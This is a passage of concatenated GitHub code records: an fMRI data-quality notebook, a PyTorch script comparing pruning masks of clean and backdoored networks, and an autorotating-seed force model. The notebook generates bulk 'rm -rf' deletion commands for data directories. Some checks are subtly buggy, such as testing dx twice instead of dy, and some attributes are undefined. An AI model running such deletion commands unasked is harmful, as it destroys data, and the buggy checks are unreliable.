df.iterrows() ]\n\n# %%time\ndf['Spatial Resolution OK'] = None\ndf['Nacq OK'] = None\ndf['TR OK'] = None\nprint('++ INFO: Number of items to iter [%d]' % len(run_list))\nprint(' + ',end='')\nfor i,item in enumerate(run_list):\n sbj,run = item.split('_',1)\n file_path = osp.join(DATA_DIR,sbj,run,run+'_mPP.nii.gz')\n if np.mod(i,50)==0:\n print('%i..' % i, end='')\n if not osp.exists(file_path):\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Spatial Resolution OK')] = False\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Nacq OK')] = False\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'TR OK')] = False\n else:\n file_img = nib.load(file_path)\n [dx, dy, dz, tr] = file_img.header.get_zooms()\n \n if np.isclose(dx,1.60) & np.isclose(dx,1.60) & np.isclose(dz,1.60):\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Spatial Resolution OK')] = True\n else:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Spatial Resolution OK')] = False\n \n if np.isclose(tr,1.0):\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'TR OK')] = True\n else:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'TR OK')] = False\n \n if file_img.shape[3] == 900:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Nacq OK')] = True\n else:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Nacq OK')] = False\nprint('')\ndf.head()\n\nprint(\"++ INFO: Number of Runs with directory available: %d\" % df[df['Dir Avail']==True].shape[0])\nprint(\"++ INFO: Number of Runs with ET available: %d\" % df[df['ET Avail']==True].shape[0])\nprint(\"++ INFO: Number of Runs with ET OK: %d\" % df[df['ET_OK']==True].shape[0])\nprint(\"++ INFO: Number of Runs with correct spatial resolution: %d\" % df[df['Spatial Resolution OK']==True].shape[0])\nprint(\"++ INFO: Number of Runs with correct number of acquisitions: %d\" % df[df['Nacq OK']==True].shape[0])\nprint(\"++ INFO: Number of Runs with expected TR: %d\" % df[df['TR OK']==True].shape[0])\nprint(\"++ ===============================================================\")\nprint(\"++ INFO: Number of Runs with all controls OK: %d\" % df[(df['Dir Avail']==True) & \n (df['ET Avail']==True) & \n (df['ET_OK']==True) & \n (df['Spatial Resolution OK']==True) &\n (df['Nacq OK']==True) &\n (df['TR OK']==True)].shape[0])\n\n# ***\n# ## Save the summary of this first QA part to disk\n\ndf.to_pickle(QA1_Results_DF_Path)\n\nprint('++ INFO: Number of runs missing ET files = %d RUNS' % (df[df['ET Avail']==False].shape[0]))\nprint('++ INFO: Number of runs with ET files available but unreadable = %d RUNS' % (df[df['ET_OK']==False].shape[0]))\n\n# ***\n#\n# ### Clean up space\n#\n# Scans that will not be used becuase the ET is not available will be removed from disk\n\ndf = pd.read_pickle(QA1_Results_DF_Path)\n\ndf = df[df['ET Avail']==False]\n\ncommand_file = open('./N01_QA_RemoveScansWithBadET.sh','w+')\nfor r,row in df.iterrows():\n command_file.write('rm -rf /data/SFIMJGC_HCP7T/HCP7T/{sbj}/{run} \\n'.format(sbj=row['Sbj'],run=row['Run']))\ncommand_file.close()\n", "repo_name": "nimh-sfim/hcp7t_fv_sleep", "sub_path": "Notebooks/N01_QA.py", "file_name": "N01_QA.py", "file_ext": "py", "file_size_in_byte": 8746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_pickle", "line_number": 45, "usage_type": "call"}, {"api_name": "utils.variables.ProjectFiles_DF_Path", "line_number": 45, "usage_type": "argument"}, {"api_name": "utils.basics.get_7t_subjects", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.basics.load_motion_info", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.variables.RUNS", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.variables.DATA_DIR", "line_number": 94, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 94, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "name"}, {"api_name": "utils.ParseEyeLinkAsc.ParseEyeLinkAsc", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "utils.variables.DATA_DIR", "line_number": 136, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 136, "usage_type": "name"}, {"api_name": "numpy.mod", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "name"}, {"api_name": "nibabel.load", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 152, "usage_type": "call"}, {"api_name": "utils.variables.QA1_Results_DF_Path", "line_number": 181, "usage_type": "argument"}, {"api_name": "pandas.read_pickle", "line_number": 192, "usage_type": "call"}, {"api_name": "utils.variables.QA1_Results_DF_Path", "line_number": 192, "usage_type": "argument"}]} +{"seq_id": "14677063857", "text": "import argparse\nimport numpy as np\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nimport cv2\nimport PIL.Image\n\n# from models import *\nimport models\n\n# Prune settings\nparser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune')\nparser.add_argument('--dataset', type=str, default='cifar10',\n help='training dataset (default: cifar10)')\nparser.add_argument('--val-batch-size', type=int, default=256, metavar='N',\n help='input batch size for validatin (default: 256)')\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\nparser.add_argument('--depth', type=int, default=16,\n help='depth of the vgg')\nparser.add_argument('--arch', default='vgg_16', type=str,\n help='architecture to use')\n# parser.add_argument('--model', default='', type=str, metavar='PATH',\n# help='path to the model (default: none)')\nparser.add_argument('--save', default='./cleanresult/1/EB-30-29.pth.tar', type=str, metavar='PATH',\n help='path to save pruned model (default: none)')\nparser.add_argument('--save_1', default='./poisonresult_2/2/EB-30-28.pth.tar', type=str, metavar='PATH',\n help='path to save pruned model (default: none)')\n\n# parser.add_argument('--save_2', default='./poisonresult_2/3/EB-30-27.pth.tar', type=str, metavar='PATH',\n# help='path to save pruned model (default: none)')\n# parser.add_argument('--start_epoch', default=0, type=int, metavar='N', help='manual start epoch number')\n# parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number')\n\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')\nprint('Experiment Starting... Check critical information below carefully!')\nprint('Training Phase: Calculate Difference of Two Masks;')\nprint('Dataset:{};'.format(args.dataset))\n# print('Dataset:{};\\tStart Epoch:{};\\tEnd Epoch:{};'.format(args.dataset, args.start_epoch, args.end_epoch)) #\nprint('Network Architecture:{};\\tDepth:{};'.format(args.arch, args.depth)) #\nprint('First Mask Path:{};'.format(args.save))\nprint('Second Mask Path:{};'.format(args.save_1))\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')\n\nsetting_perc = 0.3\n\nif not os.path.exists(args.save):\n os.makedirs(args.save)\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nmodel = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth)\nmodel_bd = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth)\n\nif args.cuda:\n model.cuda()\n model_bd.cuda()\n\n\ndef pruning(model, percent):\n total = 0\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n total += m.weight.data.shape[0]\n\n bn = torch.zeros(total)\n index = 0\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n size = m.weight.data.shape[0]\n bn[index:(index + size)] = m.weight.data.abs().clone()\n index += size\n\n y, i = torch.sort(bn)\n thre_index = int(total * percent)\n thre = y[thre_index]\n mask2 = bn.gt(thre).float().view(-1)\n return mask2\n\n\ndef get_mask(path: str, default_percent=0.3):\n print(f'==> Mask from {path} ... ')\n checkpoint = torch.load(path)\n best_epoch = checkpoint['epoch']\n print('EarlyBird Emerging Epoch: ', best_epoch)\n model.load_state_dict(checkpoint['state_dict'])\n percent = 0.3 if 'EB-30' in path else 0.5 if 'EB-50' in path else 0.7 if 'EB-70' in path else default_percent\n mask = pruning(model, percent)\n print('Remanent Percent: {}%.\\n'.format(int(torch.sum(mask == 1) * 100. / mask.size(0))))\n return mask\n\n# get clean EB\nprint('==> resumeing from {} ... '.format(args.save))\ncheckpoint = torch.load(args.save)\nbest_epoch = checkpoint['epoch']\nprint('EarlyBird Emerging Epoch: ', best_epoch)\nmodel.load_state_dict(checkpoint['state_dict'])\n\n# get backdoor EB and mask\nprint('==> resumeing from {} ... '.format(args.save_1))\ncheckpoint_bd = torch.load(args.save_1)\nbest_epoch_bd = checkpoint_bd['epoch']\nprint('EarlyBird Emerging Epoch: ', best_epoch_bd)\nmodel_bd.load_state_dict(checkpoint_bd['state_dict'])\npercent_2 = 0.3 if 'EB-30' in args.save_1 else 0.5 if 'EB-50' in args.save_1 else 0.7 if 'EB-70' in args.save_1 else setting_perc\nbest_mask_bd = pruning(model_bd, percent_2)\n\nX = []\nY = []\n\nfor percent_set in np.arange(0.3, 1, 0.05): # [0.3, 0.35, 0.4, ... , 1]:\n X.append(percent_set)\n print(\"\\nclean prune precent:\", percent_set)\n best_mask = pruning(model, percent_set) # get clean mask /key neurons\n\n in_num = 0\n for i in range(best_mask.size(0)):\n if best_mask[i] == 1 and best_mask_bd[i] == 1:# key neuron exists in both cl & bd\n in_num += 1 \n Y.append(in_num / int(torch.sum(best_mask)))\n print(\"both exist percent:\", in_num / int(torch.sum(best_mask)))\nprint(X)\nprint(Y)", "repo_name": "zeyuanyin/LTH-Backdoor", "sub_path": "plot/key_neuron_rate.py", "file_name": "key_neuron_rate.py", "file_ext": "py", "file_size_in_byte": 5281, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.__dict__", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.__dict__", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.sort", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "72831479234", "text": "\"\"\"\nFor description of the script, see the README.md\n\"\"\"\n\nimport numpy as np\nfrom printind.printind_function import printi\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\n\n\nclass ComputeForce(object):\n def __init__(self, verbose=0, rho=1000.0, added_AOA_camber_deg=0.0, radius_sphere=0.010):\n self.verbose = verbose\n self.rho = rho\n self.added_AOA_camber_deg = added_AOA_camber_deg\n self.radius_sphere = radius_sphere\n\n def set_vertical_velocity(self, vertical_velocity):\n self.vertical_velocity = vertical_velocity\n\n def set_angular_frequency(self, angular_frequency):\n self.angular_frequency = angular_frequency\n self.angular_rate = 2 * np.pi * self.angular_frequency\n\n def set_interpolator_Cl(self, interpolator_Cl):\n self.interpolator_Cl = interpolator_Cl\n\n def set_interpolator_Cd(self, interpolator_Cd):\n self.interpolator_Cd = interpolator_Cd\n\n def set_seed_profile(self, wing_instance):\n self.wing_instance = wing_instance\n\n def set_wing_pitch(self, wing_pitch):\n self.wing_pitch = wing_pitch\n\n def set_wing_chord(self, wing_chord):\n self.wing_chord = wing_chord\n\n def compute_force_all_elements(self):\n self.list_crrt_R = []\n self.list_projected_vertical_velocity = []\n self.list_AOA_deg = []\n self.list_total_velocity = []\n self.list_wind_angle_rad = []\n self.list_drag = []\n self.list_lift = []\n self.list_Cd = []\n self.list_Cl = []\n self.list_forward_force = []\n self.list_vertical_force = []\n self.list_forward_force_lift = []\n self.list_forward_force_drag = []\n self.list_vertical_force_lift = []\n self.list_vertical_force_drag = []\n self.list_base_coeff = []\n self.list_crrt_rotation_velocity = []\n self.list_forward_moments = []\n\n for (crrt_size, crrt_R, crrt_phi) in zip(self.wing_instance.list_size_element, self.wing_instance.list_R, self.wing_instance.list_phi):\n # horizontal velocity due to rotation of the seed\n crrt_rotation_velocity = self.angular_rate * crrt_R\n\n # angle of attack\n projected_vertical_velocity = self.vertical_velocity * np.cos(crrt_phi * np.pi / 180.0)\n wind_angle_rad = np.arctan2(projected_vertical_velocity, crrt_rotation_velocity)\n crrt_AOA_deg = wind_angle_rad * 180.0 / np.pi - self.wing_pitch\n\n # total velocity magnitude\n total_velocity = np.sqrt(crrt_rotation_velocity**2 + projected_vertical_velocity**2)\n\n # base coefficient for computation of lift and drag\n base_coeff = 0.5 * self.rho * (total_velocity**2) * self.wing_chord * crrt_size\n\n # compute lift and drag; careful about the orientation of crrt_AOA_deg! This is because of\n # direction of rotation vs. the sketches\n Cd = self.interpolator_Cd.return_interpolated(crrt_AOA_deg + self.added_AOA_camber_deg)\n Cl = self.interpolator_Cl.return_interpolated(crrt_AOA_deg + self.added_AOA_camber_deg)\n crrt_lift = base_coeff * Cl\n crrt_drag = base_coeff * Cd\n crrt_forward = np.sin(wind_angle_rad) * crrt_lift \\\n - np.cos(wind_angle_rad) * crrt_drag\n crrt_vertical = np.cos(wind_angle_rad) * crrt_lift \\\n + np.sin(wind_angle_rad) * crrt_drag\n\n crrt_forward_projected = crrt_forward\n crrt_vertical_projected = crrt_vertical * np.cos(crrt_phi * np.pi / 180.0)\n\n self.list_crrt_R.append(crrt_R)\n self.list_projected_vertical_velocity.append(projected_vertical_velocity)\n self.list_crrt_rotation_velocity.append(crrt_rotation_velocity)\n self.list_wind_angle_rad.append(wind_angle_rad)\n self.list_total_velocity.append(total_velocity)\n self.list_AOA_deg.append(crrt_AOA_deg)\n self.list_base_coeff.append(base_coeff)\n self.list_drag.append(crrt_drag)\n self.list_lift.append(crrt_lift)\n self.list_Cd.append(Cd)\n self.list_Cl.append(Cl)\n self.list_forward_force.append(crrt_forward_projected)\n self.list_vertical_force.append(crrt_vertical_projected)\n self.list_forward_moments.append(crrt_forward_projected * crrt_R)\n\n def compute_resultant_force(self):\n self.resultant_forward_moment = sum(self.list_forward_moments)\n self.resultant_vertical_force = sum(self.list_vertical_force)\n\n def display_reduced_information(self, title_base=None, gray_region=None):\n linewidth = 3.0\n color = (0.5, 0.5, 0.5, 0.5)\n \n \n \n # figure with profile and angle of attack ------------------------------\n fig, ax1 = plt.subplots()\n \n if gray_region is not None:\n rect = Rectangle((gray_region[0], -0.002), gray_region[1] - gray_region[0], 0.06, color=color)\n ax1.add_patch(rect)\n \n ax1.plot(self.wing_instance.list_R, self.wing_instance.list_h, 'b', linewidth=linewidth * 2.0, label=\"seed wing\", linestyle=\"-\")\n ax1.set_xlabel('R [m]')\n # Make the y-axis label, ticks and tick labels match the line color.\n ax1.set_ylabel('h [m]', color='b')\n ax1.tick_params('y', colors='b')\n plt.ylim([-0.002, 0.052])\n plt.xlim([-0.002, 0.052])\n\n ax2 = ax1.twinx()\n ax2.plot(self.wing_instance.list_R, self.list_AOA_deg, 'r', linewidth=linewidth, linestyle=\"--\", label=\"Angle of attack\")\n ax2.set_ylabel('local angle of attack [deg]', color='r')\n ax2.tick_params('y', colors='r')\n \n ax2.plot([], [], 'b', linewidth=linewidth, linestyle=\"-\", label=\"seed wing\")\n \n plt.legend(loc=\"lower right\")\n\n fig.tight_layout()\n \n plt.savefig(title_base + \"combined_fig_1.pdf\")\n # done -----------------------------------------------------------------\n \n \n \n # figure with vertical force and moment --------------------------------\n fig, ax1 = plt.subplots()\n \n if gray_region is not None:\n rect = Rectangle((gray_region[0], -0.5), gray_region[1] - gray_region[0], 1.0, color=color)\n ax1.add_patch(rect)\n \n ax1.plot(self.wing_instance.list_R, np.array(self.list_vertical_force) / np.array(self.wing_instance.list_size_element), 'b', linewidth=linewidth, linestyle=\"-\", label=\"vertical force\")\n ax1.plot([0.0, 0.049], [0.0, 0.0], 'k', linewidth=linewidth * 0.75)\n ax1.set_xlabel('R [m]')\n # Make the y-axis label, ticks and tick labels match the line color.\n ax1.set_ylabel('Vertical force distribution [N/m]', color='b')\n ax1.tick_params('y', colors='b')\n plt.ylim([-0.3, 0.3])\n plt.xlim([0.00, 0.049])\n\n ax2 = ax1.twinx()\n ax2.plot(self.wing_instance.list_R, np.array(self.list_forward_moments) / np.array(self.wing_instance.list_size_element), 'r', linewidth=linewidth, linestyle=\"--\", label=\"forward moment\")\n ax2.set_ylabel('Forward moment distribution [N.m / m]', color='r')\n ax2.tick_params('y', colors='r')\n plt.ylim([-0.0044, 0.0045])\n \n ax2.plot([], [], 'b', linewidth=linewidth, linestyle=\"-\", label=\"vertical force\")\n \n plt.legend(loc=\"lower left\")\n\n fig.tight_layout()\n \n plt.savefig(title_base + \"combined_fig_2.pdf\")\n # done -----------------------------------------------------------------\n \n \n \n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, np.array(self.list_vertical_force) / np.array(self.wing_instance.list_size_element), linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"Vertical force distribution [N/m]\")\n plt.ylim([-0.3, 0.4])\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_forceDistribution.pdf\")\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, np.array(self.list_forward_force) / np.array(self.wing_instance.list_size_element), linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.ylim([-0.2, 0.1])\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"Forward force distribution [N/m]\")\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_forwardForceDistribution.pdf\")\n plt.show()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, np.array(self.list_forward_moments) / np.array(self.wing_instance.list_size_element), linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"Forward moment distribution [N.m / m]\")\n plt.ylim([-0.008, 0.004])\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_momentDistribution.pdf\")\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, self.list_AOA_deg, linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"local angle of attack [deg]\")\n plt.ylim([-20, 50])\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_AOADistribution.pdf\")\n \n \n \n \n \n plt.show()\n\n def return_forward_moment(self):\n return(self.resultant_forward_moment)\n\n def return_vertical_force(self):\n return(self.resultant_vertical_force)\n\n def display_all_results(self):\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_AOA) * 180.0 / np.pi, label=\"AOA\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_wind_angle) * 180.0 / np.pi, label=\"wind angle\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_total_velocity, label=\"total_velocity\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_crrt_rotation_velocity, label=\"crrt_rotation_velocity\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_Cl, label=\"Cl\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_Cd, label=\"Cd\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_base_coeff, label=\"base_coeff\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_lift, label=\"lift\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_drag, label=\"drag\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_lift) / np.array(self.list_drag), label=\"lift/drag\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_forward_force_lift, label=\"forward lift\")\n plt.plot(self.wing_instance.list_R, self.list_forward_force_drag, label=\"forward drag\")\n plt.plot(self.wing_instance.list_R, self.list_vertical_force_lift, label=\"vertical lift\")\n plt.plot(self.wing_instance.list_R, self.list_vertical_force_drag, label=\"vertical drag\")\n plt.legend()\n plt.plot()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_vertical_force) / np.array(self.wing_instance.list_size_element), label=\"Vertical force\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_forward_force) / np.array(self.wing_instance.list_size_element), label=\"Forward force\")\n plt.legend()\n plt.show()\n\n\n\"\"\"\nnote that in compute_force_on_seed, both the rotation and the vertical velocity are positive for 'normal seed'. I.e.\npositive vertical velocity means seed going down, positive frequency means seed rotating as in experiments.\n\"\"\"\n", "repo_name": "jerabaul29/EffectFoldAngleAutorotatingSeeds", "sub_path": "model/compute_force_on_seed.py", "file_name": "compute_force_on_seed.py", "file_ext": "py", "file_size_in_byte": 13161, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.pi", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 87, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 203, 